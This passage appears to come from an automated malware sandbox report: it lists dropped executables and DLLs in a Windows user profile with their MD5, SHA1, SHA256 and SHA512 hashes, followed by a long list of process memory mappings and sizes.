                                                                                                                                                    4d228ef1a5c599a8bfb5a9927dcf6b2e574bef7134316725cfe17b29e36a8ac0

                                                                                                                                                    SHA512

                                                                                                                                                    c8579f904337cdd5f0e9887223d1660866c40bde01c2798af7ea4a8edd78191abdf61e39c0d2b835618ec2d0c116fc469670a437d9d3d5cdefa85d188c3b9d9b

                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\D8C2.tmp.exe
                                                                                                                                                    MD5

                                                                                                                                                    e85678abc0f85c5610cc5b20bb86af14

                                                                                                                                                    SHA1

                                                                                                                                                    671aa6b979ad923f5bfe159b226080d3c88f95c5

                                                                                                                                                    SHA256

                                                                                                                                                    99f425b08aaa3457d71fedf8ccddd174df9df10ad04df4be228a3ba3804e7ba5

                                                                                                                                                    SHA512

                                                                                                                                                    5a0b96cf55c2335e33828a839ec1ea9abe387943ff8ad4f31e3d0d8c8620271cffc28d9798577ae97649e4e1767cc26bab39d9ca016e9a34893d8eb0339327fd

                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\D8C2.tmp.exe
                                                                                                                                                    MD5

                                                                                                                                                    e85678abc0f85c5610cc5b20bb86af14

                                                                                                                                                    SHA1

                                                                                                                                                    671aa6b979ad923f5bfe159b226080d3c88f95c5

                                                                                                                                                    SHA256

                                                                                                                                                    99f425b08aaa3457d71fedf8ccddd174df9df10ad04df4be228a3ba3804e7ba5

                                                                                                                                                    SHA512

                                                                                                                                                    5a0b96cf55c2335e33828a839ec1ea9abe387943ff8ad4f31e3d0d8c8620271cffc28d9798577ae97649e4e1767cc26bab39d9ca016e9a34893d8eb0339327fd

                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\D8C2.tmp.exe
                                                                                                                                                    MD5

                                                                                                                                                    e85678abc0f85c5610cc5b20bb86af14

                                                                                                                                                    SHA1

                                                                                                                                                    671aa6b979ad923f5bfe159b226080d3c88f95c5

                                                                                                                                                    SHA256

                                                                                                                                                    99f425b08aaa3457d71fedf8ccddd174df9df10ad04df4be228a3ba3804e7ba5

                                                                                                                                                    SHA512

                                                                                                                                                    5a0b96cf55c2335e33828a839ec1ea9abe387943ff8ad4f31e3d0d8c8620271cffc28d9798577ae97649e4e1767cc26bab39d9ca016e9a34893d8eb0339327fd

                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\DC3D.tmp.exe
                                                                                                                                                    MD5

                                                                                                                                                    c3d59d08b1f437df8fd17ec4c7e5ce6c

                                                                                                                                                    SHA1

                                                                                                                                                    962db6fc632ee138f08f9c5f2c2cfa56183188f6

                                                                                                                                                    SHA256

                                                                                                                                                    051ee98c921d915df85f4afee0e6ed40cf210dc9bd70c32ab446a1596f6b6aab

                                                                                                                                                    SHA512

                                                                                                                                                    3f7bf88d03dff485b2dc294defc25de4bcd50bf6409eef1df1ec37ab6495ca2e95af3cf72752bf4790e1afd00a70c99711b719985420a8cdac6788da743abe26

                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\DC3D.tmp.exe
                                                                                                                                                    MD5

                                                                                                                                                    c3d59d08b1f437df8fd17ec4c7e5ce6c

                                                                                                                                                    SHA1

                                                                                                                                                    962db6fc632ee138f08f9c5f2c2cfa56183188f6

                                                                                                                                                    SHA256

                                                                                                                                                    051ee98c921d915df85f4afee0e6ed40cf210dc9bd70c32ab446a1596f6b6aab

                                                                                                                                                    SHA512

                                                                                                                                                    3f7bf88d03dff485b2dc294defc25de4bcd50bf6409eef1df1ec37ab6495ca2e95af3cf72752bf4790e1afd00a70c99711b719985420a8cdac6788da743abe26

                                                                                                                                                  • \Program Files\install.dll
                                                                                                                                                    MD5

                                                                                                                                                    fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                    SHA1

                                                                                                                                                    6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                    SHA256

                                                                                                                                                    9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                    SHA512

                                                                                                                                                    0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                  • \Program Files\install.dll
                                                                                                                                                    MD5

                                                                                                                                                    fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                    SHA1

                                                                                                                                                    6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                    SHA256

                                                                                                                                                    9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                    SHA512

                                                                                                                                                    0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                  • \Users\Admin\AppData\Local\Temp\is-6TQGJ.tmp\idp.dll
                                                                                                                                                    MD5

                                                                                                                                                    8f995688085bced38ba7795f60a5e1d3

                                                                                                                                                    SHA1

                                                                                                                                                    5b1ad67a149c05c50d6e388527af5c8a0af4343a

                                                                                                                                                    SHA256

                                                                                                                                                    203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

                                                                                                                                                    SHA512

                                                                                                                                                    043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

                                                                                                                                                  • memory/208-119-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/208-135-0x0000000000B1F000-0x0000000000C20000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    1.0MB

                                                                                                                                                  • memory/208-144-0x0000000004230000-0x000000000428C000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    368KB

                                                                                                                                                  • memory/340-303-0x000001B51CFB0000-0x000001B51CFFB000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    300KB

                                                                                                                                                  • memory/340-145-0x000001B51D090000-0x000001B51D100000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/416-200-0x00000000015B0000-0x00000000015B1000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/416-238-0x0000000008A60000-0x0000000008A61000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/416-211-0x0000000002D80000-0x0000000002DAB000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    172KB

                                                                                                                                                  • memory/416-189-0x0000000000C50000-0x0000000000C51000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/416-227-0x0000000005450000-0x0000000005451000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/416-230-0x0000000008360000-0x0000000008361000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/416-166-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/416-213-0x0000000002DB0000-0x0000000002DB1000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/652-146-0x000000001AFD0000-0x000000001AFD2000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/652-130-0x0000000000800000-0x0000000000801000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/652-120-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/652-124-0x00000000002C0000-0x00000000002C1000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/652-128-0x00000000007D0000-0x00000000007D1000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/652-129-0x00000000007E0000-0x00000000007FC000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    112KB

                                                                                                                                                  • memory/676-152-0x000002595D860000-0x000002595D8D0000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/1036-184-0x00000247F60A0000-0x00000247F6110000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/1092-162-0x000001442DBD0000-0x000001442DC40000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/1092-310-0x000001442E870000-0x000001442E8E0000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/1144-194-0x00000194BEDC0000-0x00000194BEE30000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/1276-291-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1356-239-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1356-241-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    88KB

                                                                                                                                                  • memory/1396-196-0x000001DE69B60000-0x000001DE69BD0000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/1408-186-0x000001B3FEE20000-0x000001B3FEE90000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/1552-269-0x000001FA59900000-0x000001FA59A01000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    1.0MB

                                                                                                                                                  • memory/1552-138-0x000001FA57040000-0x000001FA5708B000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    300KB

                                                                                                                                                  • memory/1552-133-0x00007FF7893B4060-mapping.dmp
                                                                                                                                                  • memory/1552-161-0x000001FA57240000-0x000001FA572B0000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/1936-190-0x0000021991E90000-0x0000021991F00000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/1936-317-0x0000021992940000-0x00000219929B0000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/1984-231-0x0000000000970000-0x0000000000971000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/1984-215-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/1984-229-0x000000000DE80000-0x000000000DE81000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2184-235-0x0000000002470000-0x0000000002472000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/2184-232-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/2320-360-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/2320-179-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/2320-198-0x00000000029A0000-0x00000000029A1000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2320-188-0x0000000000740000-0x0000000000741000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2320-203-0x00000000029B0000-0x00000000029BE000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    56KB

                                                                                                                                                  • memory/2320-204-0x00000000098B0000-0x00000000098B1000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2320-205-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2320-209-0x0000000004A50000-0x0000000004A51000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/2416-157-0x00000223B0A00000-0x00000223B0A70000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/2448-151-0x000002D38C340000-0x000002D38C3B0000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/2448-312-0x000002D38C3B0000-0x000002D38C420000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/2580-140-0x000001ECF73A0000-0x000001ECF7410000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/2696-199-0x0000022B03D00000-0x0000022B03D70000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/2708-202-0x0000022088420000-0x0000022088490000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    448KB

                                                                                                                                                  • memory/2820-364-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3064-208-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    172KB

                                                                                                                                                  • memory/3064-206-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3252-116-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3592-225-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/3592-212-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/3816-292-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4064-361-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4116-243-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4116-256-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/4128-274-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4144-260-0x0000000002F70000-0x0000000002F72000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/4144-246-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4184-268-0x0000000002A02000-0x0000000002A04000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/4184-261-0x0000000002A00000-0x0000000002A02000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/4184-250-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4184-271-0x0000000002A04000-0x0000000002A05000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/4212-343-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4236-255-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4236-275-0x0000000002B95000-0x0000000002B97000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/4236-272-0x0000000002B94000-0x0000000002B95000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    4KB

                                                                                                                                                  • memory/4236-270-0x0000000002B92000-0x0000000002B94000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/4236-259-0x0000000002B90000-0x0000000002B92000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    8KB

                                                                                                                                                  • memory/4296-297-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4296-305-0x0000000004B3E000-0x0000000004C3F000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    1.0MB

                                                                                                                                                  • memory/4336-290-0x0000000003440000-0x0000000003488000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    288KB

                                                                                                                                                  • memory/4336-265-0x0000000000220000-0x000000000022D000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    52KB

                                                                                                                                                  • memory/4336-262-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4528-295-0x00000001401FBC30-mapping.dmp
                                                                                                                                                  • memory/4528-302-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    3.5MB

                                                                                                                                                  • memory/4596-282-0x00000000005E0000-0x00000000005F2000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    72KB

                                                                                                                                                  • memory/4596-281-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    64KB

                                                                                                                                                  • memory/4596-276-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4608-363-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4628-367-0x0000000000416202-mapping.dmp
                                                                                                                                                  • memory/4700-357-0x0000000000402F68-mapping.dmp
                                                                                                                                                  • memory/4740-362-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4744-326-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4764-349-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4800-283-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4804-354-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4876-286-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4880-353-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4908-359-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4960-350-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/4972-352-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5032-289-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5036-368-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5048-329-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5060-340-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5132-279-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5188-338-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5200-339-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5220-309-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                    Filesize

                                                                                                                                                    7.0MB

                                                                                                                                                  • memory/5220-301-0x00000001402CA898-mapping.dmp
                                                                                                                                                  • memory/5252-355-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5292-304-0x0000000000401480-mapping.dmp
                                                                                                                                                  • memory/5452-342-0x00000000004161F6-mapping.dmp
                                                                                                                                                  • memory/5496-351-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5524-314-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5544-365-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5560-366-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5600-341-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5684-358-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5716-321-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5852-344-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5896-356-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5920-322-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5932-346-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/5944-369-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/6044-325-0x0000000000000000-mapping.dmp
                                                                                                                                                  • memory/6120-348-0x0000000000000000-mapping.dmp